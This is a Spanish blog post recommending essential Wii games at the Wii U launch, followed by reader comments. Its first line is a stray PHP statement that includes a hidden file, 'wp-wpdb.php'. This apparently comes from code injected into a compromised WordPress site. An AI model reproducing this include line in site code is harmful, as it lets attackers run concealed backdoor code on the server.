if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Los imprescindibles de Wii – La Fortaleza de LeChuck

Los imprescindibles de Wii

El próximo 30 de noviembre Nintendo se embarcará en la alta definición con Wii U. La nueva consola de Nintendo tomará el testigo de Wii para volver a revolucionar nuestro concepto de jugar, solos o con otros, con el Wii U GamePad. Me gustaría repasar con vosotros los que, a mi parecer, son los títulos imprescindibles de Wii. Algo se muere en alma cuando una consola se va…
No hay ninguna duda de que Wii coexistirá con Wii U durante unos cuantos años sin ningún problema, pero nada volverá a ser igual.

Mario Kart Wii

El que no puede faltar nunca cuando hablamos de los juegos imprescindibles para cualquier consola de Nintendo es Mario Kart. Lo más destacable de esta entrega fue la incursión de los vehículos de dos ruedas y el paso que acercó un poco más a la saga hacia el afianzamiento en el modo multijugador en red. Por lo demás, no hay nada más que añadir, es un Mario Kart, la diversión está asegurada incluso antes de su salida.
Espero que Nintendo vaya con ojo porque hay un tal Sonic & Sega All-Stars Racing que no lo está haciendo nada mal.

Super Smash Bros. Brawl


Masahiro Sakurai se toma su tiempo con los Super Smash Bros. y se nota. Tres entregas y tres obras maestras que nada tienen que envidiar a Street Figther o Tekken. Luchar con nuestros personajes favoritos es algo divertidísimo de lo que no nos cansaremos nunca.

The Legend of Zelda: Skyward Sword y The Legend of Zelda: Twilight Princess

Otro de los que nunca puede faltar es The Legend of Zelda. Skyward Sword recuperó parte de la mecánica presente en anteriores entregas y Twilight Princess oscureció un poco la saga, de una forma figurada y literal al mismo tiempo, después del maravilloso The Wind Waker. Dos títulos que, a pesar de ser muy diferentes, dentro de las posibilidades que tienen dos juegos de la misma saga a no parecerse, jamás dejarán de ser dos de los más imprescindibles de Wii.

New Super Mario Bros. Wii

Un plataformas que no defraudó a nadie. La receta es sencilla y nunca falla pero es una pena que actualmente se este explotando tanto. Esperemos que Mario no tenga que lamentarlo.

Super Mario Galaxy y Super Mario Galaxy 2

¿Será por juegos de Mario? Si verdaderamente tuvierámos que elegir los dos títulos más imprescindibles de Wii protagonizados por el personaje más polifacético del mundo de los videojuegos estoy seguro que serían Super Mario Galaxy y Super Mario Galaxy 2.
Los pequeños detalles, el maravilloso apartado visual, la cuidada jugabilidad y las preciosas melodías han logrado crear dos títulos increíbles que siempre se encontraran entre los mejores juegos de Wii y de Nintendo. Parecía difícil igualar lo que un día hizo Super Mario 64 pero, con Super Mario Galaxy, Nintendo volvió a dejarnos a todos los jugadores con la boca abierta.

Metroid Prime 3: Corruption (Metroid Prime Trilogy)

El capítulo final de la trilogía de Retro Studios. Si no se ha jugado al primero y al segundo hacerse con todos de golpe es una opción que nadie debería desaprovechar. Es un must-have se mire por donde se mire.

Donkey Kong Country Returns

Donkey Kong Country Returns hizo uso de la misma receta que se utilizó en New Super Mario Bros. Wii. Retro Studios nos hizo olvidar a Rare por primera vez con un plataformas de la vieja escuela que no debe faltar en nuestras estanterías.

No More Heroes y No More Heroes 2: Desperate Struggle


Suda51 es un genio, esto es así. Su buen hacer brilla con fuerza en No More Heroes. En las dos entregas encarnamos a Travis Touchdown, un joven asesino de 27 años con el que nos sentiremos identificados de una manera preocupante. Convertirse en el asesino número uno es el objetivo de Travis Touchdown  y para ello tendrá que deshacerse de un buen puñado de adversarios un tanto peculiares. Los juegos originales, divertidos y de brillante factura como No More Heroes serán siempre bienvenidos en esta generación en la que los shooters han ocupado y ocupan gran parte de los lanzamientos.

Little King’s Story

Y si hablamos de títulos originales no nos podemos olvidar de Little King’s Story. Todo aquel que lo prueba queda enamorado desde el primer minuto. El juego tiene un encanto especial y en gran parte se debe a su traducción, odiada y querida a partes iguales, y a su banda sonora. Para el que no lo haya probado, Little King’s Story es uno de los juegos más imprescindibles de Wii ya que ha aprovechado la originalidad y jugabilidad de Pikmin y la ha llevado a un nivel superior.

The Last Story, Xenoblade Chronicles y Pandora’s Tower

Los últimos coletazos de Wii han venido de la mano de estos tres J-RPGs. Cada jugador tendrá su favorito pero los tres son brillantes exponentes del género. Me atrevo a decir que, al igual que ocurrió con Tales of Symphonia, Baten Kaitos: Eternal Wings and the Lost Ocean y Baten Kaitos Origins, se revalorizaran.

Zack & Wiki: En busca del Tesoro de Barbaros

Zack & Wiki: En busca del Tesoro de Barbaros es un juego de puzzles que bebe de las aventuras gráficas más tradicionales. Muy dinámico, original y con mucho sentido del humor. Ya no se ve demasiado por las tiendas pero siempre podremos recurrir a Internet… yo me daría prisa e invertiría en «Zack & Wiki’s».

Monster Hunter Tri

El gremio de los cazadores consiguió más miembros con otro magnífico título de la famosa saga Monster Hunter. El modo online totalmente gratuito, el uso del mando clásico y un gran número de misiones han convertido a Monster Hunter Tri en uno de los mejores juegos de Capcom de los últimos años.

No están todos los que son pero si son todos los que están, títulos como Sonic Colours, Tatsunoko vs. Capcom: Ultimate All-StarsEpic Mickey, Metroid: Other M, Punch-Out!!, Animal Crossing: Let’s Go to the City e incluso Wii Sports también merecen ser mencionados. Wii ha sido una consola trascendental en la historia de los videojuegos, siempre la recordaremos.
Cuando una consola se apaga, otra se enciende, ¿a qué sí?

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

14 comentarios

    1. Ah y por cierto, eso de que Wii coexistirá con Wii U no estoy de acuerdo, mas que nada porque hace dos años que Wii en cuánto a lanzamientos está bastante muerta. Han sacado 4 juegos buenos contados desde hace ese tiempo, ya de por si casi no existe para Nintendo, menos lo hará cuando salga Wii U.

  1. Una gran muestra de que comprar wii no era tan mala opcion como alguno descian, todo en la vida merece la pena , y sobretodo si nos traen tal catalogo, aunque es pequeño es de gran calidad.
    Aunque no temrina de ser muy popular en occidente , personalmente añadiria Fire emblem radiant dawn

  2. Totalmente de acuerdo con la lista. Tengo casi todos y quiero hacerme con un par de los que me faltan… ¿Creeis que con la salida de la WiiU bajarán un poco mas de precio (15 euros)?

Dejar un comentario